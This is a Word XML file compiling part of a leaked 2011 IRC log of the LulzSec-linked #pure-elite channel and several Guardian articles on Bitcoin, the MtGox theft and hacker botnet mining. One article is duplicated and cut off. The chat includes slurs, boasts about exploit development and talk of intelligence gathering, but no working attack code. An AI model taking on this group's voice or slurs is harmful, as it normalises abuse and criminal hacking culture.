          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:51:04 joepie91 Sabu: actually after I typed that shit I connected to my IRC Jun 04 17:51:06 joepie91 idk what was wrong Jun 04 17:51:13 joepie91 and I don't like switching VPNs, all my shit has to reconnect Jun 04 17:51:14 joepie91 and shit Jun 04 17:51:50 [redacted] 90% of the IRC's convo is joepie saying stuff Jun 04 17:51:51 [redacted] :] Jun 04 17:51:52 storm ues Jun 04 17:51:54 storm yes Jun 04 17:52:01 storm hes a friend from #phrack Jun 04 17:52:03 storm hes hardcore Jun 04 17:52:21 joepie91 [redacted]: I know, I'm very talkative Jun 04 17:52:24 joepie91 a bit too talkative sometimes Jun 04 17:52:31 joepie91 on the other hand, works fairly well to gather intel :) Jun 04 17:53:33 sabu sup [redacted] you sexy ass nig Jun 04 17:53:38 storm sabu Jun 04 17:53:42 storm did you see this pastebin yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:53:52 storm http://pastebin.com/RBjzDQbS Jun 04 17:54:03 &lt;io&gt; he's op in #phrack on efnet Jun 04 17:54:12 &lt;io&gt; which is not the ezine btw but the group Jun 04 17:54:22 storm i know who he is Jun 04 17:54:23 storm ;p Jun 04 17:54:30 &lt;io&gt; someone asked above Jun 04 17:54:35 storm he is friends with 2l8 Jun 04 17:54:36 storm ah Jun 04 17:54:40 &lt;io&gt; neuron.. was just adding my info :) Jun 04 17:54:46 neuron lol Jun 04 17:54:47 storm :p Jun 04 17:55:16 joepie91 meh.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:55:18 joepie91 0.79mbps Jun 04 17:55:25 joepie91 methinks I'm going to try a different vpn node Jun 04 17:55:28 joepie91 in a bit Jun 04 17:55:29 joepie91 :P Jun 04 17:56:10 sabu true Jun 04 17:56:19 trollpoll man, this pastebin is very cool Jun 04 17:56:21 trollpoll who rote?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:56:25 trollpoll wrote* Jun 04 17:56:42 storm hm Jun 04 17:57:23 * joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 04 17:58:10 storm jux probably Jun 04 17:58:20 storm must be an agent Jun 04 17:59:27 trollpoll ok, so, here who is from CIA?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 17:59:31 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 17:59:35 trollpoll :) Jun 04 18:16:49 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Sat Jun 4 18:16:49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BEGIN LOGGING AT Sat Jun 4 18:17:02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04 18:17:02 * Now talking on #pure-elite Jun 04 18:17:02 * Topic for #pure-elite is: pE | Research and exploit development | Coding, designing, penetrating, packeting, laughing at our crippled opponents Jun 04 18:17:02 * Topic for #pure-elite set by Topiary!t@HA- p22.rkn.75e5ku.IP at Fri Jun 3 17:06:56 2011 Jun 04 18:18:00 * neuron listens to wub wub wub Jun 04 18:18:04 lol i dont understand this open letter wht is it trying to say? Jun 04 18:18:06 lol :o Jun 04 18:18:21 joepie91 I'll talk to jaromil Jun 04 18:18:33 joepie91 he seems to not get a few things Jun 04 18:18:34 joepie91 &gt;.&gt; Jun 04 18:18:40 trollpoll is out of context Jun 04 18:19:20 joepie91 I get his point Jun 04 18:19:21 joepie91 however Jun 04 18:19:34 joepie91 With its dramatic announcement Jun 04 18:19:34 joepie91 the LoU played into the hands of policy makers who want complete Jun 04 18:19:34 joepie91 control over the Internet and are looking for reasons to seize it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:20:00 joepie91 that is the same argument as "by taking down shit you only give them more reason to crack down" Jun 04 18:20:12 joepie91 which is, imo, plain bullshit Jun 04 18:20:41 lol i think stuxnet proved the internet is not needed to engage in cyber war Jun 04 18:20:58 trollpoll I love this ending "Now we are all sons of bitches" Jun 04 18:21:07 trollpoll is epic Jun 04 18:22:00 &lt;io&gt; also, they do already have laws against hacking. all they do is whine now.. and what's ther bigges action? they call it now war. or terrorism even, whatever.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:22:05 &lt;io&gt; it doesn't help them with their problem Jun 04 18:22:18 &lt;io&gt; that worked in afghanistan or iraq cause they needed legitimation to raid Jun 04 18:22:24 &lt;io&gt; but wat now? invade the internet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:22:42 &lt;io&gt; and they cant restrict it the way they would like to Jun 04 18:22:46 &lt;io&gt; ecomomics would crash Jun 04 18:22:52 trollpoll thats the term "invade", all of us, thinks that internet is a real independent state Jun 04 18:22:57 trollpoll (all of us?) Jun 04 18:23:21 trollpoll so, any state invaded will try to defense Jun 04 18:23:30 trollpoll and obviously, counter attack Jun 04 18:23:41 &lt;io&gt; yup, internet is very similar to a sate Jun 04 18:23:56 &lt;io&gt; it state* Jun 04 18:24:00 &lt;io&gt; gah.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:24:19 trollpoll of course they started the war, trying to politice internet, and trying to impose their law Jun 04 18:24:54 joepie91 ya Jun 04 18:25:06 joepie91 it would be funny if it weren't so sad Jun 04 18:25:16 joepie91 to see how corporations are trying to "claim" the internet Jun 04 18:25:24 lol ok so has everyone left tht irc now?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:25:25 trollpoll yes Jun 04 18:25:25 joepie91 as if it's their exclusive distribution platform Jun 04 18:25:38 joepie91 it wasn't made this way for them in the first place, damnit Jun 04 18:26:05 trollpoll thats it, they are trying to convert internet in a "desktop app" with as many links as you can pay Jun 04 18:26:25 joepie91 ya Jun 04 18:26:38 joepie91 corporations should realize the internet isn't theirs Jun 04 18:26:44 joepie91 and I don't mean the physical tubes Jun 04 18:26:48 joepie91 but the actual internet Jun 04 18:26:51 joepie91 the community, idea, concept Jun 04 18:27:25 trollpoll yes, the utopie is to create a new internet... corporation free Jun 04 18:27:40 trollpoll using each one its infrastructures Jun 04 18:28:32 trollpoll or perhaps, a big corp like google inverting in infrastructures Jun 04 18:28:48 trollpoll inverting?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:28:51 trollpoll ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:30:00 joepie91 mye Jun 04 18:30:00 joepie91 also Jun 04 18:30:03 joepie91 what the fuck Jun 04 18:30:08 joepie91 what is with all these companies and orgs Jun 04 18:30:09 joepie91 going all Jun 04 18:30:14 joepie91 OMG WE NEED A NEW DESKTOP EXPERIENCE Jun 04 18:30:16 joepie91 first Unity Jun 04 18:30:17 joepie91 then GNOME3 Jun 04 18:30:20 joepie91 now Windows 8?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:30:24 joepie91 http://www.youtube.com/watch?v=8upI6M4T92U Jun 04 18:30:33 joepie91 this shit is as counterproductive as possibly can be, my god Jun 04 18:30:58 joepie91 it's the web 2.0 of the desktop OS -_- Jun 04 18:31:47 pwnsauce i used win8 leaked Jun 04 18:31:49 pwnsauce is very gay Jun 04 18:32:03 Topiary what the fuck is that, Kinect on steroids?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:32:06 trollpoll of course they want to convert a pc in an iphone Jun 04 18:32:19 Topiary seriously I'm mad at all this stupid waggle-your- arms-to-pet-tiger technology Jun 04 18:32:30 joepie91 ya Jun 04 18:32:38 joepie91 seriously Jun 04 18:32:40 joepie91 web 2.0 Jun 04 18:32:43 joepie91 now on your desktop OS Jun 04 18:32:44 * Topiary is a beast with the mouse/keyboard/gamepad Jun 04 18:32:50 joepie91 you know what's the worst?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:32:57 joepie91 linux was the goddamn first OS to have this stupid crap Jun 04 18:33:02 trollpoll ppl will love...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:33:04 joepie91 Unity, GNOME3...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:33:28 joepie91 trollpoll: people love anyting as long as the buzzword:crash ratio is above 1 Jun 04 18:33:35 joepie91 anything* Jun 04 18:33:54 trollpoll years ago i was talking about this, someone told me, web browsers are the SO of the future Jun 04 18:34:02 Topiary people love anything they can virtually drag their fat finger across, as long as it makes a contrail behind it in shiny effects Jun 04 18:34:28 storm i love porn Jun 04 18:34:45 neuron i agree with storm Jun 04 18:34:48 neuron he makes a valid poin Jun 04 18:35:04 lol lol :D Jun 04 18:35:04 trollpoll ok, i got it, stop talking about shit Jun 04 18:35:20 trollpoll everybody knows, internet is for pr0nnnn Jun 04 18:36:17 trollpoll (but after few years storm, you will have a unique destktop application called porn and you will pay for that) Jun 04 18:36:25 trollpoll xDD Jun 04 18:36:53 joepie91 po.rn Jun 04 18:37:16 lol ewww pron is disgusting :O Jun 04 18:37:19 lol xD Jun 04 18:37:53 pwnsauce joepie91 - reg that domain and fill it with shock videos xD Jun 04 18:38:18 joepie91 lol Jun 04 18:38:19 joepie91 also Jun 04 18:38:22 joepie91 I am going to take a stab Jun 04 18:38:31 joepie91 and say that Windows 8 uses Trident Jun 04 18:38:34 joepie91 to render the new touch UI shit Jun 04 18:38:38 joepie91 aka internet explorer Jun 04 18:38:46 joepie91 with only support for HTML5 and Silverlight Jun 04 18:38:51 joepie91 as well as .NET integration Jun 04 18:38:58 joepie91 that IE will thus be integrated deeply into the system Jun 04 18:38:59 trollpoll silverlight... who the fuck uses this shit? Jun 04 18:39:00 pwnsauce it supports vb6 binaries still Jun 04 18:39:03 joepie91 not only meaning you can't get rid of it Jun 04 18:39:05 pwnsauce we tested Jun 04 18:39:08 joepie91 but also meaning Jun 04 18:39:16 joepie91 that IE is yet again deeply integrated into the system Jun 04 18:39:20 joepie91 introducing a buttload of new vulnerabilities Jun 04 18:39:34 joepie91 let's see when the final release comes out, if the above is accurate.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:39:36 trollpoll good point Jun 04 18:39:43 joepie91 they did it before, wouldn't be surprised if they did it again.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 18:40:00 joepie91 remember windows 95/98(?) and the IE integraten? Jun 04 18:40:03 joepie91 integration* Jun 04 18:40:15 trollpoll microsoft has imrpoved their security very very well in tha last few years Jun 04 18:40:43 joepie91 yes, but a bit less bad doesn't make it good Jun 04 18:41:02 joepie91 if IE is gonna be this deeply integrated, I guarantee you that there will be shitloads of holes Jun 04 18:41:04 trollpoll but obviously, being the most used SO in the world, makes the cake bigger for researchers Jun 04 18:41:52 pwnsauce MORE CAKE!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Sat Jun 4 18:42:02 2011</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Guardian Unlimited 2011.06.24 19:21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/24/lulzsec-irc-leak-the-full-record</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Bitcoins: What are they, and how do they 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one of the first attempts to create a real-world currency with no governments, no central banks, and no rules Tweet this reddit this Comments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Ball guardian.co.uk, Wednesday 22 June 2011 14.07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 can it becoem a real-world currency? Photograph: Matt Cardy/Getty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started, and ended, with a click. With one touch of a mouse, a hacker managed to transfer 25,000 credits of online currency Б─" then worth almost $500,000 dollars Б─" to his own account. The transfer is visible on a public register; the original owner has publicised his plight online, but to no avail Б─" the money is gone.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hack, which happened in June 2011, was the first major online heist for Bitcoins, one of the world's newest currencies, and the subsequent panic left many casual users reeling.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Days later, it was dwarfed by hack number two: an attack on the currency's biggest online exchange, involving more than 400,000 Bitcoins Б─" worth almost $9m (бё5.5m). The attempt to sell off the coins was a sale so huge it plunged the value of each coin from more than $17 to $0.01.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MtGox, was promptly taken offline, and is planning to reverse the transactions. No-one knows what the currency will be worth Б─" if anything Б─" when it reopens.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is the strange world of the online frontier. Bitcoin isn't the currency of an online game or Facebook fad Б─" it's one of the first attempts to create a real-world currency with no governments, no central banks, and no rules. More than 6,500,000 Bitcoins are in circulation, in an online economy, which was worth over $180m shortly before June's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bank or government issues new Bitcoins. Instead, they are "mined" in batches of 50 as a result of intensive calculations carried out on PCs across the world. Anyone wanting to mine the coins installs mining software, which carries out intensive calculations on a certain unit of "work".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Whichever computer around the world solves the problem receives 50 Bitcoins. Six months ago, this reward was worth less than $1. At the start of June 2011, it was worth $1,000. The work generally needs powerful computers to pay off: some developers involved with the project estimate a typical laptop could work for two years without ever generating any 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rocketing value of the coins Б─" and the increasing difficulty of mining them Б─" it's no surprise people have started going to extraordinary lengths to generate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on mining forums discuss cooling their computers in dry ice to allow the processors to run faster, customising specialist chips, or borrowing networked computing power to generate more coins. One even reported the upturn in his electricity use was so significant his house was raided by police, who were concerned that he might be farming cannabis.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the hacking collectives LulzSec and Anonymous, behind many of the high-profile hacks of recent weeks, may have found a more innovative solution: using other people's computers.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famed distributed denial-of-service attacks rely on botnets Б─" networks of computers to which hackers have gained access, usually without the owners' knowledge Б─" to provide the weight of numbers to take down high profile targets.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purported members of Anonymous, plus intermediaries linked to Anon and to Lulzsec, have confirmed some individuals connected to the organisations have used their botnets to "mine"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Credible reports suggest some individuals connected to Anonymous have botnets with more than 100,000 active computers. A network of this size, even mining Bitcoins inefficiently, has the potential to generate 400 to 500 coins a day Б─" worth in excess of $7,500 before the crash.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Coders in the Bitcoins community are divided by the involvement of the hacking collectives in their community. While some deny any botnet mining occurs, others concede it's a factor, and admit a slump in processing power data in April signified a botnet being turned off. One, who preferred not to be named, acknowledged it was "neat that those guys decided they could get a better return from participating in Bitcoins than by attacking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attractions of Bitcoins to such communities are manifold. It's an online-only experiment with no government or corporate involvement. It's accepted as currency on hundreds of sites worldwide, including one claiming to sell illegal drugs and several selling pornography.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also, despite having a public register of all transactions, capable of being totally anonymous. Users taking other precautions will find the only occasion at which they might link their Bitcoins wallet to their real identity is when transferring their coins into real cash at privately owned exchanges.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these can base themselves anywhere in the world, and often reject regulation, law enforcement agencies have a problem Б─" if the Bitcoins experiment survives, criminals and money-launderers may soon have a near- untraceable channel through which to funnel their proceeds.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as troubling to some agencies is WikiLeaks' recent decision to embrace the new currency, giving its donors the prospect of anonymity as secure as the site claims its whistleblowers enjoy.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prospects trouble those driving the development of the currency far less; instead, the majority see the benefits of an unfettered currency as outweighing the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freedom to easily, instantly, and at very low cost pay anybody in the world is the fundamental idea," says Gavin Andresen, described as Bitcoin technical lead. "The internet gives us the ability to communicate with anybody in the world easily, instantly, and at very low cost; I think it should be as easy to pay somebody across the world as it is to send them an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Nils Schneider, puts it more succinctly: "Bitcoin is an experiment to make a 'raw' digital currency. Such a currency does not need supervision."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Schneider also lacked sympathy for the victim of the 25,000 Bitcoin theft which first brought security jitters to the fledgling community. Bitcoin wallets at present are stored with no encryption whatsoever by default, and transfers of stolen material are irreversible unless half of all Bitcoin users agree to it. The change in price when the Bitcoins hit the market after the hack. Source: MtGox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Asked Б─" before the MtGox hack Б─" about the situation, Schneider said: "We're working on adding encryption to the wallet so it can't be stolen that easily again. But other than that, Bitcoin is like cash. You have to secure it yourself and shouldn't keep too many Bitcoins on an easily hackable computer."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should the currency take off, he hoped banks would emerge to aid people in securing their wallets.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the simplest explanation for what brought thousands of users Б─" many non-technical Б─" to an unprotected currency is the sheer increase in value it attained in recent months. On 1 January 2011, Bitcoins were worth 30 cents each. By 9 June 2011, they were worth $29.55.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total volume of US dollar to Bitcoins traded on MtGox was $146,000 in January. In the first two weeks of June alone, this was 143 times bigger, at $21m worth of trades.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been generating value from nothing, and breaking the economic rules of virtually every currency. By design, Bitcoins at present have an inflation rate estimated by one developer at 7,200% (this will automatically drop to 0% over the next 30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hyperinflation usually causes the exchange rate of a currency to plummet Б─" as happened to Germany in the early 1930s, or Zimbabwe over the past decade. Bitcoins' value instead increased almost a hundredfold in six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those most centrally involved in Bitcoins agree that prior to the MtGox hack Bitcoin was in a bubble Б─" and that a loss of trust could be fatal: "The growth rate is certainly not sustainable. I don't know if the current value with respect to established currencies is sustainable or not; certainly if people lost trust in the Bitcoin system its value would crash," says Andresen.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experiment that has never been tried before. People should think of it as an internet startup Б─" it might be wildly successful, or it might fail. In any case, I do not expect that the road ahead will be smooth: even if Bitcoin is ultimately successful, I expect more price bubbles, scams, software bugs, failures of Bitcoin-related businesses and other problems that I can't even imagine right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Bitcoin's travails, the more idealistic developers are keen to point out the wider benefits an open currency could have, if it became established. Controversially Б─" within the community at least Б─" some also acknowledge legal oversight may be necessary for these to be realised.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in the third world are at the mercy of corrupt governments and banks," says Amir Taaki, co-founder of Bitcoin Consultancy. "Bitcoin can drastically reduce overheads and fight corruption. At present, it's possible to pay up to 23% commission on an international funds transfer. That's not capitalism, that's a corruption of capitalism."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days after the massive hack of MtGox brought the fledgling currency to its knees, its idealists awaited its reopening to see if a currency without rules, government, or corporate control could withstand its first crash to survive long enough to deliver any of its potential benefits.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wealthiest Bitcoin users have more pressing concerns. It's only when the exchange reopens that they'll learn if their electronic wallets are worth millions of dollars, or less than the $10 USB stick on which they're stored. It's a tense wait.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Guardian Unlimited 2011.06.23 02:21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/22/bitcoins-how-do-they-work</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rogue suspected of Bitcoin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$9m of online currency was stolen in weekend attack on Bitcoin currency exchange that could cost members of Anonymous and LulzSec thousands of dollars each Tweet this reddit this Comments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Ball guardian.co.uk, Wednesday 22 June 2011 21.25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LulzSec logo. The group has denied involvement in the Bitcoin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rogue member of hacker group LulzSec is suspected to have been responsible for a hack last weekend which resulted in the theft of $9m worth of online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focused around a "currency exchange" called MtGox, which provides a method for swapping Bitcoins Б─" an untraceable, cryptographically created online currency favoured by web activists and hackers Б─" for real US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Б─" which could cost members of LulzSec and fellow collective Anonymous thousands of dollars each Б─" suggests other, more profit-focused hacking groups may be stepping up activity in response to the more high- profile politicised ones.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has denied any involvement in the Bitcoin hack. The group has also denied any link to attacks on the websites of games company Sega and the UK Office for National Statistics.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 on Sunday MtGox was compromised when a hacker tried to sell more than 400,000 Bitcoins Б─" 6% of all the virtual currency presently in circulation Б─" for an initial price of $17.50 each, which would have netted $7m at a constant price.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attempt to sell such a large volume of coins at once drove the value of the currency down almost to zero, before trading on the site was suspended.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60,000 users' details were also compromised in the attack and have since been posted publicly in dozens of places across the internet. Trading on the MtGox site has still not been reinstated since the attack, leaving the future of the fledgling currency in doubt.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produced without the involvement of governments or banks; instead, they are generated by using software (also called Bitcoin). The idea was created in 2009 by a Japanese programmer.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not issued by a central authority, but instead generated by a mathematical algorithm after computers complete a certain number of complex calculations.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most experienced members of the Anonymous and LulzSec hacker collectives are believed to have had "botnets" Б─" hijacked networks of PCs Б─" of more than 100,000 compromised computers.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that many machines were set to work generating Bitcoins, they could create up to $7,500 worth a day at current trading levels Б─" meaning members of the hacker collectives could be among the biggest losers if the value does not recover as and when MtGox reopens. In the hours before the hack the total value of Bitcoins in circulation was more than $150m.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Anonymity and security are key features of the currency, which has attracted controversy after being used in sites selling drugs and pornography.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High-profile organisations accepting the coins include WikiLeaks and the US lobby group Electronic Frontiers Foundation, which have suspended their acceptance of bitcoins in the wake of the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says access to its site was gained after a financial auditor's computer was hacked, and insists its site was not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Amir Taaki, who runs the rival Bitcoin exchange Britcoin.co.uk, disputes this chain of events. Developers working on his site, which runs on much of the same software as MtGox, found a security hole several days before the hack was carried out. He says MtGox was notified publicly and privately of the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recent events at MtGox.com, we at Britcoin have decided to move our servers to a new location," read a Britcoin statement. "MtGox suffered an SQL injection [a form of hacking attack that creates direct access to databases and files] which means access to the site's funds were in the hands of the malicious hacker. As such, until we see evidence to the contrary, for security reasons we are assuming that MTGox has none of its clients'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senior coders in the Bitcoin community claim to have been offered the full database of MtGox users days before the hack was carried out. Though they had not verified whether the database was genuine, it came from the same intermediary who has been testing interest in selling or distributing details from the Sega Pass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LulzSec, the hacker group whose alleged member Ryan Cleary was arrested in Essex on Tuesday, denied responsibility for the Sega Pass hack, as did several members of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spate of hacks denied by both groups Б─" neither of which usually seeks to hide from the limelight Б─" raises the possibility of a third, as yet unnamed, group of hackers carrying out the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and Anonymous members stand to lose a significant amount of money if Bitcoins fail. Several members of both groups Б─" speaking directly and through intermediaries Б─" claim to know of others using thousands of hacked computers to generate Bitcoins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Guardian Unlimited 2011.06.23 02:21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/22/lulzsec-rogue-suspected-of-bitcoin-hack</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rogue suspected of Bitcoin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$9m of online currency was stolen in weekend attack on Bitcoin currency exchange that could cost members of Anonymous and LulzSec thousands of dollars each Tweet this reddit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Ball guardian.co.uk, Wednesday 22 June 2011 21.25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LulzSec logo. The group has denied involvement in the Bitcoin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rogue member of hacker group LulzSec is suspected to have been responsible for a hack last weekend which resulted in the theft of $9m worth of online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focused around a "currency exchange" called MtGox, which provides a method for swapping Bitcoins Б─" an untraceable, cryptographically created online currency favoured by web activists and hackers Б─" for real US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Б─" which could cost members of LulzSec and fellow collective Anonymous thousands of dollars each Б─" suggests other, more profit-focused hacking groups may be stepping up activity in response to the more high- profile politicised ones.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has denied any involvement in the Bitcoin hack. The group has also denied any link to attacks on the websites of games company Sega and the UK Office for National Statistics.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 on Sunday MtGox was compromised when a hacker tried to sell more than 400,000 Bitcoins Б─" 6% of all the virtual currency presently in circulation Б─" for an initial price of $17.50 each, which would have netted $7m at a constant price.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attempt to sell such a large volume of coins at once drove the value of the currency down almost to zero, before trading on the site was suspended.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60,000 users' details were also compromised in the attack and have since been posted publicly in dozens of places across the internet. Trading on the MtGox site has still not been reinstated since the attack, leaving the future of the fledgling currency in doubt.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produced without the involvement of governments or banks; instead, they are generated by using software (also called Bitcoin). The idea was created in 2009 by a Japanese programmer.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not issued by a central authority, but instead generated by a mathematical algorithm after computers complete a certain number of complex calculations.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most experienced members of the Anonymous and LulzSec hacker collectives are believed to have had "botnets" Б─" hijacked networks of PCs Б─" of more than 100,000 compromised computers.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that many machines were set to work generating Bitcoins, they could create up to $7,500 worth a day at current trading levels Б─" meaning members of the hacker collectives could be among the biggest losers if the value does not recover as and when MtGox reopens. In the hours before the hack the total value of Bitcoins in circulation was more than $150m.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Anonymity and security are key features of the currency, which has attracted controversy after being used in sites selling drugs and pornography.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High-profile organisations accepting the coins include WikiLeaks and the US lobby group Electronic Frontiers Foundation, which have suspended their acceptance of bitcoins in the wake of the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says access to its site was gained after a financial auditor's computer was hacked, and insists its site was not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Amir Taaki, who runs the rival Bitcoin exchange Britcoin.co.uk, disputes this chain of events. Developers working on his site, which runs on much of the same software as MtGox, found a security hole several days before the hack was carried out. He says MtGox was notified publicly and privately of the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recent events at MtGox.com, we at Britcoin have decided to move our servers to a new location," read a Britcoin statement. "MtGox suffered an SQL injection [a form of hacking attack 